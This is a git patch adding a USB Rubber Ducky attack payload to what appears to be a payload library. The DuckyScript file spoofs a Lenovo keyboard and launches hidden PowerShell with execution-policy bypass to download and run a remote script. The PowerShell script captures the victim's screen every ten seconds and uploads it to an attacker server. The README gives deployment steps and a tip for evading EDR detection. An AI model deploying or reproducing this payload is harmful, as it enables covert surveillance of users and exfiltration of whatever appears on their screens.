From f0cb608d09d6de4569cee043dcbca9c45672a743 Mon Sep 17 00:00:00 2001 From: Thomas Boeglin Date: Tue, 6 Aug 2024 09:58:39 +0200 Subject: [PATCH] Add Windows-Screenshot-Exfil payload --- .../Windows-Screenshot-Exfil/README.md | 67 ++++++++++++++++++ .../Windows-Screenshot-Exfil/payload.txt | 67 ++++++++++++++++++ .../Windows-Screenshot-Exfil/script.ps1 | 69 +++++++++++++++++++ 3 files changed, 203 insertions(+) create mode 100644 payloads/library/exfiltration/Windows-Screenshot-Exfil/README.md create mode 100644 payloads/library/exfiltration/Windows-Screenshot-Exfil/payload.txt create mode 100644 payloads/library/exfiltration/Windows-Screenshot-Exfil/script.ps1 diff --git a/payloads/library/exfiltration/Windows-Screenshot-Exfil/README.md b/payloads/library/exfiltration/Windows-Screenshot-Exfil/README.md new file mode 100644 index 0000000..fb18987 --- /dev/null +++ b/payloads/library/exfiltration/Windows-Screenshot-Exfil/README.md @@ -0,0 +1,67 @@ +# Windows Screenshot Exfiltration Payload + +## Overview + +This payload captures screenshots from a Windows machine every 10 seconds and uploads them to a specified server using the Powershell. The payload is designed to run until the window is closed or the loop is broken out. + +## Features + +- **Target OS**: Windows 10, 11 +- **Exfiltration Method**: Screenshots are taken and uploaded to a server every 10 seconds. +- **Detection and Execution**: Automatically detects if the target OS is Windows and executes the payload accordingly. +- **HID Emulation**: Emulates a Lenovo keyboard with a random serial number. +- **Fallback**: If the OS is not Windows, the USB Rubber Ducky will function as a storage device. + +## Files + +- `payload.txt`: The main script that is deployed to the USB Rubber Ducky. +- `script.ps1`: The Staged PowerShell script that takes screenshots and uploads them to the server. + +## Setup Instructions + +1. **Server Setup**: Set up a server to receive the uploaded screenshots and host the script.ps1 file. I used [IngoKl/HTTPUploadExfil](https://github.com/IngoKl/HTTPUploadExfil) as it is pretty easy to set up. +2. **Update URLS**: Modify `script.ps1` to include your server URL where the screenshots will be uploaded and modify `payload.txt` to reference the URL of the hosted `script.ps1` + - `$url` in `script.ps1` + - `#MY_STAGED_SCRIPT` in `payload.txt` +3. **Upload Files**: + - Inject `payload.txt` on the USB Rubber Ducky. + - Host `script.ps1` on a web server. + +Note: In the provided files, the exanple URLs are followed by `/l` in the payload and by `/p` for the sending of screenshots, this is because I use HTTPUploadExfil, modify this is you do not use the same exfil server as I do. + +## Usage + +### Payload Execution + +1. **Insert USB Rubber Ducky**: Plug the USB Rubber Ducky into the target machine. +2. **OS Detection**: The payload automatically detects if the target OS is Windows. +3. **Payload Deployment**: + - If Windows is detected, it emulates a Lenovo keyboard, opens PowerShell, and runs the PowerShell script. + - If the target OS is not Windows, it switches to storage mode (Usefull for dev purposes). + +### PowerShell Script Execution + +The PowerShell script (`script.ps1`) runs the following commands: + +1. Takes a screenshot every 10 seconds. +2. Uploads the screenshot to the specified server. +3. Repeats until the PowerShell window is closed. + + +## Alternative + +Some EDR detect the download of a powershell script from internet, this clould led to the payload beeing blocked. As an alternative, you could take the content of `script.ps1` and put in directly in the payload. + +``` +GUI r +DELAY 500 +STRINGLN powershell +DELAY 500 +STRINGLN + [... The content of script.ps1 here ...] +END_STRINGLN +ENTER +DELAY 500 +ALT SPACE +STRING n +``` \ No newline at end of file diff --git a/payloads/library/exfiltration/Windows-Screenshot-Exfil/payload.txt b/payloads/library/exfiltration/Windows-Screenshot-Exfil/payload.txt new file mode 100644 index 0000000..56f17e8 --- /dev/null +++ b/payloads/library/exfiltration/Windows-Screenshot-Exfil/payload.txt @@ -0,0 +1,67 @@ +REM_BLOCK DOCUMENTATION + Title: Windows Screenshot Exfiltration + Author: https://github.com/thomasboegl1 + Description: This payload sends you screenshots of the screen every 10sec until the Powershell window is closed. + Target: Windows 10, 11 + Version: 1.0 + Category: Exfiltration +END_REM + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + +REM REQUIRED - Provide URL used for staged payload +DEFINE #MY_STAGED_SCRIPT https://example.com/l/script.ps1 + +IF ($_OS == WINDOWS) THEN + REM Emulate Lenovo keyboard with random serial + ATTACKMODE HID VID_17EF PID_609B MAN_Lenovo PROD_Duck SERIAL_RANDOM + REM Open the Run dialog + GUI r + DELAY 500 + REM Type PowerShell command + STRINGLN powershell w- h -NoP -NonI -Exec Bypass $pl = iwr #MY_STAGED_SCRIPT; invoke-expression $pl +ELSE + REM The USB Rubber Ducky will function as a flash drive + ATTACKMODE STORAGE +END_IF diff --git a/payloads/library/exfiltration/Windows-Screenshot-Exfil/script.ps1 b/payloads/library/exfiltration/Windows-Screenshot-Exfil/script.ps1 new file mode 100644 index 0000000..0aac589 --- /dev/null +++ b/payloads/library/exfiltration/Windows-Screenshot-Exfil/script.ps1 @@ -0,0 +1,69 @@ +Add-Type @' +using System; +using System.Runtime.InteropServices; +using System.Drawing; + +public class DPI { + [DllImport("gdi32.dll")] + static extern int GetDeviceCaps(IntPtr hdc, int nIndex); + + public enum DeviceCap { + VERTRES = 10, + DESKTOPVERTRES = 117 + } + + public static float scaling() { + Graphics g = Graphics.FromHwnd(IntPtr.Zero); + IntPtr desktop = g.GetHdc(); + int LogicalScreenHeight = GetDeviceCaps(desktop, (int)DeviceCap.VERTRES); + int PhysicalScreenHeight = GetDeviceCaps(desktop, (int)DeviceCap.DESKTOPVERTRES); + + return (float)PhysicalScreenHeight / (float)LogicalScreenHeight; + } +} +'@ -ReferencedAssemblies 'System.Drawing.dll' -ErrorAction Stop + +$url = "https://example.com/p" + + +while ($true) { + # Add necessary types + Add-Type -AssemblyName System.Windows.Forms,System.Drawing + + # Get virtual screen information + $s = [System.Windows.Forms.SystemInformation]::VirtualScreen + + # Create a bitmap of the virtual screen size + $b = New-Object System.Drawing.Bitmap ([int32]([math]::round($($s.Width * [DPI]::scaling()), 0))),([int32]([math]::round($($s.Height * [DPI]::scaling()), 0))); + [System.Drawing.Graphics]::FromImage($b).CopyFromScreen($s.Left, $s.Top, 0, 0, $b.Size) + + # Save bitmap to a memory stream in PNG format + $m = New-Object System.IO.MemoryStream + $b.Save($m, [System.Drawing.Imaging.ImageFormat]::Png) + $f = $m.ToArray() + + # Set up the multipart form-data + $boundary = "----WebKitFormBoundary7MA4YWxkTrZu0gW" + $fileName = "$env:COMPUTERNAME-$(Get-Date -Format HHmmss).png" + $body = @" +--$boundary +Content-Disposition: form-data; name="file"; filename="$fileName" +Content-Type: image/png + +$f +--$boundary-- +"@ + # Convert the body to byte array + $bB = [System.Text.Encoding]::UTF8.GetBytes($body) + + # Set the headers + $headers = @{ + "Content-Type" = "multipart/form-data; boundary=$boundary" + } + + # Send the HTTP request + Invoke-WebRequest -Uri $url -Method Post -Headers $headers -Body $bB + + # Wait for 10 seconds before the next iteration + Start-Sleep -Seconds 10 +} \ No newline at end of file